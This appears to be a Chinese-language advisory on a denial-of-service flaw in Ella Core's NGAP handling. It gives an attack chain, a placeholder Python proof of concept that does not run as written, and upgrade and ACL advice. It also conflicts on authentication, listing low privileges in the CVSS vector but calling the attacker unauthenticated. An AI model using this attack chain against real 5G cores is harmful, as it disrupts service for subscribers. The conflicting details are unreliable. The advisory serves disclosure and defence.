CVE-2026-33281 Ella Core NGAP消息拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-33281

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ella Core

漏洞概述

Ella Core是一款专为私有网络设计的5G核心网产品。在1.6.0版本之前，该系统在处理NGAP协议消息时存在安全缺陷。当接收到包含无效PDU会话ID（即ID不在1-15的有效范围内）的消息时，系统会发生panic崩溃。未经身份认证的攻击者可以通过发送特制的恶意NGAP数据包利用此漏洞，导致目标服务进程崩溃，进而对所有已连接的订阅用户造成严重的服务拒绝攻击。

技术细节

该漏洞的根源在于Ella Core在处理NGAP（下一代应用协议）消息时，未对接收到的PDU会话ID进行严格的边界检查。根据3GPP相关规范，PDU会话ID通常应在特定有效范围内（例如1-15）。然而，受影响版本的代码在解析消息时直接使用了接收到的ID值，而未验证其是否处于合法区间。当攻击者向Ella Core发送包含越界PDU会话ID（例如0或大于15的数值）的特制NGAP数据包时，程序逻辑无法处理该异常输入，导致运行时错误并触发系统panic。由于Ella Core作为核心网组件，其进程崩溃将导致整个网络控制平面的暂时瘫痪，影响所有依赖该核心网的终端设备连接。攻击者利用此漏洞无需具备高权限，仅需网络可达性即可发起攻击，这使得漏洞利用门槛较低，危害范围广。

攻击链分析

STEP 1

侦察

攻击者扫描网络以寻找暴露的Ella Core N2接口（通常运行在SCTP协议上）。

STEP 2

构建攻击包

攻击者构造一个特制的NGAP协议数据包，将其中的PDU Session ID字段设置为无效值（如0或大于15）。

STEP 3

发送恶意消息

攻击者无需认证，直接将构造好的恶意NGAP消息发送给目标Ella Core节点。

STEP 4

触发漏洞

Ella Core在处理该消息时，因未校验PDU Session ID的合法性，触发异常逻辑导致进程panic。

STEP 5

达成拒绝服务

Ella Core进程崩溃，导致5G核心网服务中断，所有连接的用户失去网络连接。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-33281
# This script demonstrates the logic to send a crafted NGAP message with an invalid PDU Session ID.
# Note: Actual NGAP message construction requires ASN.1 encoding libraries (e.g., asn1crypto).

import socket

def send_malicious_ngap(target_ip, target_port):
    """
    Sends a crafted packet to trigger the panic in Ella Core < 1.6.0
    """
    # In a real exploit, this payload would be a valid NGAP PDU structure
    # but with the 'PDU Session ID' Information Element set to 0 or > 15.
    # For demonstration purposes, we simulate sending a byte stream.
    
    # Placeholder for malicious payload structure:
    # NGAP PDU -> InitialUEMessage -> PDU Session ID (Invalid: 0)
    malicious_payload = b"\x00\x1c\x40\x..." 
    
    print(f"[*] Sending crafted NGAP message to {target_ip}:{target_port}...")
    
    try:
        # NGAP typically runs over SCTP, but TCP/UDP might be used in some test environments.
        # Adjust socket type as necessary (socket.IPPROTO_SCTP).
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))
        sock.send(malicious_payload)
        print("[+] Payload sent successfully.")
        print("[+] Check if the Ella Core process has crashed.")
        sock.close()
    except Exception as e:
        print(f"[-] Error sending payload: {e}")

if __name__ == "__main__":
    TARGET_IP = "192.168.X.X"  # Replace with actual target IP
    TARGET_PORT = 38412        # Standard NGAP/SCTP port (example)
    send_malicious_ngap(TARGET_IP, TARGET_PORT)

影响范围

Ella Core < 1.6.0

防御指南

临时缓解措施

建议立即将Ella Core升级至1.6.0或更高版本以彻底修复此漏洞。如果暂时无法升级，应在网络防火墙处配置严格的ACL规则，仅允许可信的基站（gNodeB）IP地址访问Ella Core的N2接口端口（通常是SCTP端口），以阻断来自未授权源的攻击流量。